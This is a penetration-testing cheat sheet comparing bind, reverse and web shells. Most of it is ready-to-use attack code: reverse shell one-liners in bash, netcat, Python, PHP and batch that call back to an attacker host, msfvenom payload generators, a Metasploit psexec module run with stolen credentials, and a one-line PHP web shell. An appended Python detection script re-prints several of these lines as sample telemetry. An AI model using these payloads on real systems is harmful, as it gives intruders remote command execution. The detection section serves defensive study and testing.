Reverse vs Bind vs Web Shell


Bind Shell

The code starts a listener on the target that is attached to a shell; we then connect to that port to obtain remote code execution. This has the advantage of not requiring any configuration on our network, but inbound connections may be blocked by firewalls protecting the target.

Reverse Shell

The code makes the target connect back to the attacker's computer. Reverse shells are a good way to bypass firewalls, since outbound connections are filtered far less often than inbound ones. The drawback is that we need to configure our network to accept the shell: we need to set up a handler.

Web Shell

The code allows the attacker to send shell commands to the target server via a web page hosted on that server.

Reverse Shell Handlers


NETCAT

nc -lvnp [ATTACKER_PORT]
Open a listener on the selected port.


METASPLOIT

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp
exploit
Handler for a Linux (ELF) x86 Meterpreter reverse shell.

Reverse Shell Multi


Resources

PayloadsAllTheThings Reverse Shell Cheat Sheet

Pentestmonkey Reverse Shell Cheat Sheet


NETCAT

nc -e /bin/bash [ATTACKER_IP] [ATTACKER_PORT]
Reverse shell.


PYTHON

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Reverse shell.


PHP

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1'");
?>
Very simple reverse shell.

Fancy reverse shell: Pentestmonkey PHP Reverse Shell. Location on Kali: /usr/share/webshells/php/php-reverse-shell.php

Reverse Shell Windows


BAT

@echo off
nc.exe [ATTACKER_IP] [ATTACKER_PORT] -e cmd.exe
Reverse shell.


HOAXSHELL

sudo python3 hoaxshell.py -s [ATTACKER_IP]
Create a reverse shell payload (one that uses Invoke-Expression) and start a handler.


MSFVENOM

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a meterpreter reverse shell exe.


METASPLOIT (SMB)

use exploit/windows/smb/psexec

set lhost [ATTACKER_IP]
set rhosts [TARGET_IP]
set smbdomain [TARGET_DOMAIN]
set smbuser [TARGET_USER]
set smbpass [TARGET_PASSWORD]
set payload windows/x64/meterpreter/reverse_tcp
exploit
Create a reverse shell over SMB (psexec) using valid credentials for the target.

Reverse Shell Linux


BASH

bash -i >& /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1
Reverse shell.


MSFVENOM

msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT]
Generate a Linux netcat reverse shell command.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x86.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x64.

Web Shell


PHP

<?php
system($_GET["cmd"]);
?>
Web shell. After uploading it, browse to http://[TARGET_IP]/myWebShell.php?cmd=whoami
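From the defender's side, every technique on this sheet leaves a recognisable trace in process command lines or web-server request logs. The following is an added example (not part of the original cheat sheet) that runs simple pattern rules over constructed sample telemetry; the events, rule names and the 203.0.113.10 address are all assumptions made up for the demonstration.

```python
import re

# Constructed sample telemetry (not real captures): process command lines as an EDR or
# auditd execve record would report them, plus two web-server access-log request lines.
SAMPLE_EVENTS = [
    {"kind": "process", "text": "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"},
    {"kind": "process", "text": "nc -e /bin/bash 203.0.113.10 4444"},
    {"kind": "process", "text": "nc.exe 203.0.113.10 4444 -e cmd.exe"},
    {"kind": "process", "text": "python3 -c 'import socket,subprocess,os;"
     "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"203.0.113.10\",4444));"
     "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'"},
    {"kind": "process", "text": "nc -zv db.internal 5432"},   # benign connectivity check
    {"kind": "process", "text": "ls -la /var/www/html"},
    {"kind": "http", "text": "GET /uploads/myWebShell.php?cmd=whoami HTTP/1.1"},
    {"kind": "http", "text": "GET /index.php?page=home HTTP/1.1"},
]

# One rule per technique on the cheat sheet: (rule name, event kind, compiled pattern).
# The web-shell rule keys on the "cmd" query parameter used above; a real web shell can
# name its parameter anything, so treat that rule as a weak indicator only.
RULES = [
    ("bash_dev_tcp_redirect", "process", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("netcat_exec_flag", "process", re.compile(r"(?:^|\s)nc(?:\.exe)?\b.*\s-e\s")),
    ("python_socket_dup2", "process", re.compile(r"socket\.socket\(.*os\.dup2\(")),
    ("php_webshell_cmd_param", "http", re.compile(r"\.php\?(?:[^\s&]*&)*cmd=")),
]


def match_rules(event):
    """Return the names of all rules whose pattern matches this single event."""
    return [name for name, kind, pattern in RULES
            if event["kind"] == kind and pattern.search(event["text"])]


def scan(events):
    """Return [(event_index, rule_name), ...] for every hit, preserving event order."""
    return [(i, name) for i, ev in enumerate(events) for name in match_rules(ev)]


if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        print(f"event {i}: {name}: {SAMPLE_EVENTS[i]['text'][:60]}")
```

The listener-only form `nc -lvnp` and the plain port check produce no hit, while each reverse shell and the web shell request are flagged once.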